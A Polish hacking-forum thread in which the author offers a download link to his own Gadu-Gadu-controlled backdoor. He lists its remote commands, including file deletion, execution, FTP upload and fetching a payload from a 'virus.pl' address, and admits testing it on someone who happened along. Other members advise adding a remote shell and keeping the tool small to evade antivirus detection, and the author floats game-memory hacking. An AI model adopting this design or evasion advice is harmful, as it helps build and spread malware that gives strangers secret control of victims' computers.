Klawisz_HCK v1.0

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Klawisz_HCK v1.1

Witam!

Zamieszczam wam program mojego autorstwa.
Program działa w oparciu o protokół Gadu-Gadu.

Zawartość pliku readme:
Kod:
Aby uzyskać listę dostępnych komend wpisz: help
Parametry oddzielamy znakiem "|". Przykład użycia: fcopy|C:\plik.txt|D:\plik.txt



Notka prawna:
	Program wykonany w celach wyłącznie naukowych.
	Zrzekam się odpowiedzialnosći za nieodpowiednie użycie programu.

Link do programu Klawisz_HCK v1.1


Funkcje:
Kod:
fexist - sprawdzenie czy plik istnieje. Przykład: fexist|C:\a.txt
	fcopy - kopiowanie pliku. Przykład: fcopy|C:\a.txt|C:\a_copy.txt
	fdelete - usuwanie pliku. Przykład: fdelete|C:\a.txt
	fmove - przeniesienie pliku. Przykład: fmove|C:\a.txt|D:\a.txt
	fdownload - pobranie pliku na komputer. Przykład: fdownload|http:/virus.pl/virus.exe|c:\virus.exe
	fstart - uruchamia program / plik. Przykład: fstart|C:\program.exe
	help - lista komend. Przykład: help
	aterminate - brutalnie kończy działanie programu. Przykład: aterminate
	cd - umożliwia zabawę szufladką CD-ROM'u.
		cd|open - otwiera szufladkę CD-ROM'u.
		cd|close - zamyka szufladkę CD-ROM'u.
	gg - umożliwia operowanie serwerem.
		gg|descr - zmienia opis serwera. Przykład: gg|descr|Klawisz_HCK :D
		gg|state - zmienia stan serwera.
			gg|state|ggwithme - ustawia status "PoGGadaj ze mną".
			gg|state|available - ustawia stan "Dostępny".
			gg|state|busy - ustawia stan "Zaraz wracam".
			gg|state|dnd - ustawia stan "Nie przeszkadzać".
			gg|state|invisible - ustawia stan "Niewidoczny".
			gg|state|notavailable - ustawia stan "Niedostępny". Tym samym tracimy połączenie z programem.
	fupload - upload plików na ftp.
		fupload|host|port|login|haslo|plik_do_zauploadowania

Zaawansowanie funkcje:
Kod:
- sytem kodowania danych konfigurowanych przez konfigurator
- możliość zmiany sposobu autostartu
- podczas konfigurowania jest dostępna opcja %win% w pozycji "Zapis pliku" - która ma za zadanie automatyczne rozpoznanie na jakim dysku jest windows. Zaleca się używania tej funkcji.

UWAGA!!
Wielkość liter ma znaczenie!

Macie może jeszcze jakieś pomysły na funkcje jakie można by było umieścić?
Czekam na wasze propozycje.
 
Ostatnia edycja:

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Lepiej nad tym popracuj, wklepałeś parę linijek kodu, IMHO to jeszcze za mało żeby się tym chwalić. 4 komendy, praktycznie zerowa funkcjonalność, koszmarne wykonanie...
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
dodaj cmd i transfer plikow na serwer ftp i bedzie juz duzo lepiej ;)
 

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Eee... Sorki kolego... 300 linijek kodu - to dla Ciebie mało?
Odliczyłem już te które samo wygenerowało.

Do tego dodam - że wciąż nad nim pracuję. Teraz dodałem parę funkcji i za chwilę umieszczę nowy link i zmienię trochę opis.
Więc nie gorączkuj się tak. Lepiej byś napisał jakie komendy by jeszcze się przydały...


PS: Częściowo proszę o wyrozumiałość - miałem półroczną przerwę w pisaniu programów i trochę mogłem wyjść z wprawy.


// Edit

Co do wypowiedzi grzonu. Cenię sobie Twoje wypowiedzi - bo pamiętam że wiele mi pomogłeś (jak jeszcze miałem konto I3L4D3).
CMD - nie.
Transfer plików na FTP - tak.

Co powiedzie na to żeby było można edytować wartosci w pamięci jakiegoś procesu?
Program stałby się porządnym narzędziem jeśli chodzi o hacking gier online...
Np. taki Metin2... Podajesz nazwę procesu i adres komórki pamięci (oczywiście ta zabawa - dla zaawansowanych) i pokazuje Ci jaka jest zawartość... :D
 
Ostatnia edycja:

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
hehe :) kolego 300 linijek kodu to sie pisze w 20 minut ;)

//EDIT

Do takich rzeczy sa juz dedykowane narzedzia. Dobry backdoor to nie ten ktory jest jak szwajcarski scyzoryk ze potnie ci kiełbase, porąbie drzewo, rozpali ognisko i jeszcze podetrze dupe jak trzeba tylko jak wytrych ;) jak juz wejdzie to masz dostep do wszystkiego i mozesz uzywac narzedzi specjalnych do danej czynnosci.
Backdoor ktory jest jak wspomniany scyzoryk bedzie wiekszy i duzo szybciej zostanie dodany do baz AV bo mocno sie rzuca w oczy.
Dlatego polecam nadal zrobic zdalne cmd i jakies podstawowe funkcje w stylu transferu plikow i na tym zakonczyc.
 
Ostatnia edycja:

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Bardzo możliwe że 20 minut... No ale trzeba było sobie poprzypominać wszystkie funkcje... Ogółem zabierałem się za to cały dzień... xD
Bo zrobiłem parę programów (każdy od czego innego), żeby po prostu przypomnieć sobie co i jak... Problemem dla mnie było zrobienie konfiguratora... Ponieważ co chwile wywalało mi I/O error, a jak nie wywaliło, to po prostu nie modyfikowało pliku serwera... No ale cóż, poradziłem sobie, przypomniałem co i jak i znowu wracam do akcji... :D
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Klawisz95 napisał:
Eee... Sorki kolego... 300 linijek kodu - to dla Ciebie mało?
W tym przypadku to tyle, co nic.
Klawisz95 napisał:
Lepiej byś napisał jakie komendy by jeszcze się przydały...
Dostęp do cmd lub: listowanie zawartości katalogu, wyświetlania zawartości pliku, zmiana atrybutów, uruchomienie pliku, zapis do pliku, wyszukiwanie plików, upload plików. Pobieranie plików, wyświetlanie/zabijanie procesów. Cokolwiek, w tej chwili program jest praktycznie bezużyteczny.
Mógłbyś też poprawić generator (serwer z zasobach, szyfrowana dane, dać możliwość ustawienia gdzie/jak ma się instalować) i serwer (wywalić zbędne zasoby, poprawić ścieżki).
 

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Tak tak... Ale nie wystawiam go na żadną mega giga skalę. Wystawiam go tylko tutaj. :)
Nie czerpię z tego zysków finansowych... xD
CMD jak już mówiłem NIE.
Listowanie zawartości katalogu - jest (flist)
Wyświetlanie zawartości pliku - pamiętajmy że korzystamy z protokołu GG. Możliwe by było przejrzenie zawartości pliku który ma w sobie tylko 1000 znaków...
Zmiana atrybutów - tymczasowo brak. Popracuję nad tym.
Uruchomienie pliku - już jest (fstart)
Zapis do pliku - a dokładniej zapis czego do pliku?
Wyszukiwanie plików - po co komu to?
Upload plików - planuję zrobić na FTP :)
Pobieranie plików - już jest (fdownload)
Wyświetlanie / zabijanie procesów - tymczasowo brak. Popracuję nad tym.
Szczegółowa konfiguracja - na razie brak. Jak zrobię jakieś porządne funkcje - to się tym zajmę, a na razie to mogę odłożyć na bok ;)
 
Ostatnia edycja:

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Otwierałes kiedys piwo?

Czym bardziej jestes obeznany z tematem tym mniej ci do tego potrzeba. Ale to co tutaj dales to ani otweracz ktorym kazdy idiota otworzy piwo ani tez np. drugie piwo ktorym ktos juz troche bardziej zaprawiony otworzy ;)
Wiec najpierw zdecyduj co chcesz stworzyc, potem przygotuj dobrze to narzedzie a dopiero potem publikuj bo chyba nie wiesz jak to jest siedziec z piwem w reku i nie moc go otworzyc ;)
 

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Heh... Co do piwa - to mamy z kumplami takie patenty na otwieranie piwa... Że bania mała... :D
Jeden to nawet zębami otworzy... xD
Nie wiem jak to jest mieć piwo w ręce i nie móc otworzyć.

Ale co jest z tym nie tak? To że chcę rozwijać dalej ten program? To że na początek rzuciłem "ogryzek" programu, a dopiero po tym zaczołem go ulepszać?
To jest złe? Przecież to chyba dobre? Pytam się użytkownika co widziałby w takim programie - i umieszczam to o ile sądzę że jest to przydatne.
 

D.F.

Były Moderator
Dołączył
Listopad 4, 2009
Posty
493
Nie popieram tego typu oprogramowania, jednak ogólnie z wydawanymi programami robi się tak, że wydaje się np. wersję testową, prosi się o przetestowanie, pyta co dodać, a następnie uwzględnia poprawki i wydaje drugą wersję. Nie dopisuje się po jednej funkcji, co chwile na nowo publikuje i pyta się co jeszcze. Wersja testowa jak i kolejne wersje powinny być przemyślane i dopracowane, programów się nie pisze "oby jak najszybciej". Program w pewnym stopniu odzwierciedla umiejętności osoby, która go stworzyła. Jeżeli wszystko jest przemyślane, dobrze zaprojektowane i estetyczne, użytkownik myśli o autorze, nie jako o amatorze, tylko o osobie znającej się na danej rzeczy. I nawet jak nie umie się danej rzeczy zrobić teraz, to czasem warto się coś poduczyć, poświęcić więcej czasu i wtedy wydać program.
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
calkowicie popieram D.F. ;)

@autor
wlasnie rzuciles ogryzek i ktos spojrzy i pomysli "ale badziew" i nie bedzie czekal na kolejne wersje bo pierwsza byla bardzo uboga. Lepiej najpierw poswiecic ten miesiac i napisac dobrze zaprojektowany program niz wydac ten "ogryzek" w ciagu jednego dnia i pytac co jeszcze.
Tak samo moglbym rzucic puste okno na forum i zapytac co mam teraz napisac i czym to okno uzupelnic.
 

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Oj. Trochę źle wszystko pojmujecie...
Spójrzcie z tej strony... Program jest bezawaryjny - zawsze działa (testowałem go osobiście na 3 komputerach i do tego na kolesiu jakimś który mi się nawinoł). Do tego szybko napisany - nie ukazuje on umiejętności programisty z dobrej strony?
Bo skoro ktoś napisał szybko dobry program - to musi posiadać jakieś umiejętności.
Komentujecie - a nie testowaliście nawet (od strony bezawaryjnośći).
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Spójrzcie z tej strony... Program jest bezawaryjny - zawsze działa
...
Komentujecie - a nie testowaliście nawet (od strony bezawaryjnośći)
Ok, przetestowałem i stwierdzam, że program nie jest bezawaryjny. Dlaczego zakładasz, że wszyscy mają windowsa na dysku C? Ja nie mam, więc po reboocie program się nie uruchomi. Kolejna sprawa - przy rozłączeniu internetu wywala 2 błędy i nie chce się ponownie połączyć, nie znam się za bardzo, ale to chyba niedobrze? Natomiast jeśli połączenia z internetem nie ma podczas włączania programu to się najzwyczajniej w świecie wywala.
Klawisz95 napisał:
Do tego szybko napisany - nie ukazuje on umiejętności programisty z dobrej strony?
Bo skoro ktoś napisał szybko dobry program - to musi posiadać jakieś umiejętności.
Znaczy co, rzuciłeś program mając nadzieję na same pochlebstwa i pochwały? Jeśli tak to się przeliczyłeś. Program nie jest dobry, sam jestem w stanie coś takiego napisać (albo raczej zlepić z gotowców - efekt ten sam). Lepiej albo nad nim popracuj albo poducz się programować, w obecnej chwili nie masz się czym chwalić.
 

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
Ok, przetestowałem i stwierdzam, że program nie jest bezawaryjny. Dlaczego zakładasz, że wszyscy mają windowsa na dysku C? Ja nie mam, więc po reboocie program się nie uruchomi. Kolejna sprawa - przy rozłączeniu internetu wywala 2 błędy i nie chce się ponownie połączyć, nie znam się za bardzo, ale to chyba niedobrze? Natomiast jeśli połączenia z internetem nie ma podczas włączania programu to się najzwyczajniej w świecie wywala.
Znaczy co, rzuciłeś program mając nadzieję na same pochlebstwa i pochwały? Jeśli tak to się przeliczyłeś. Program nie jest dobry, sam jestem w stanie coś takiego napisać (albo raczej zlepić z gotowców - efekt ten sam). Lepiej albo nad nim popracuj albo poducz się programować, w obecnej chwili nie masz się czym chwalić.

No i właśnie... Dałes mi ten efekt który chciałem uzyskać. Wiedziałem że czegoś mi brakuje - ale nie mogłem sobie przypomnieć czego.
To teraz tak. Muszę ustalić pozycję partycji z windowsem.
Zanim się połączy sprawdzać czy jest połączenie z internetem i w razie jego utraty czekać do momentu uzyskania.

Takie rzeczy - to błahostka... Dla przykładu. Pobranie ścieżki do windowsa (GetWindowsDirectory - funkcja WinAPI).
A połączenie można monitorować z wykorzystaniem WSAData :)

Jak mówiłem - nie jestem "nieumiejętny", ale po prostu długo nie siedziałem w trojkach i nie wiem jakie funkcje powinny mieć.

Za chwilę ukarze się kolejna wersja - ale jeszcze bez w/w poprawek.
 
Ostatnia edycja:

Klawisz95

Użytkownik
Dołączył
Styczeń 24, 2010
Posty
54
I proszę bardzo. Poprawiana została z prawa z windowsem na innej partycji.


// Edit
Od teraz aplikacja stale monitoruje czy jest dostęp do internetu.
Zaraz po włączeniu:
- jeżeli brak połaczenia z internetem - to czeka
- jeżeli połączenie z internetem - to łączy się i włącza wszystkie swoje funkcje.

Jeżeli jakimś cudem zabraknie połączenia z internetem - to:
- wyskoczy błąd (Asychronaus Socket Error) [nie wiem jak to "ukryć"]

Ale nawet po błędzie - jeżeli internet znów się pojawi - to aplikacja będzie działać normalnie.

Może nakieruje mnie ktoś jak ukryć bład?
A z resztą, niech ktoś obeznany sam zobaczy co to za błąd (raz wyskakują 2 będy, a raz 1 bład - nie wiem od czego to zależy).


PS : Przyznaję - nie jestem dość dobry żeby samemu sobie poradzić z tym błędem. Ale po za tym to raczej nie ma zastrzeżeń co do moich umiejętności.
 
Ostatnia edycja:

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Daj mi kod to ci znajde wiecej bledow bo nie chce mi sie robic RE
mozesz wyslac na pw
 

kanar123

Użytkownik
Dołączył
Marzec 27, 2008
Posty
451
Człowieku... Twoje umiejętności nie są duże programujesz w Delphi rok ? może 1,5...
Ludzie którzy piszą programy uczą się po 13 lat a i tak ciągle zaskakują ich nowe zagadnienia... sry za offtop ale twierdzenie że jest się specjalistą w jakiejś dziedzinie wymaga ogromnej wiedzy i umiejętności a jak Ty nie wiesz co oznaczają te błędy i jak je obsłużyć to nie mam nic do dodania...

Pozdrawiam
KANAR123
 

grzonu

Były Moderator
Dołączył
Grudzień 26, 2006
Posty
1390
Dobrze panowie koniec offtopu dalej nie wyrazamy opini na temat umiejetnosci programistycznych autora jedynie oceniamy program pod wzgledem uzytecznosci.
 
Do góry Bottom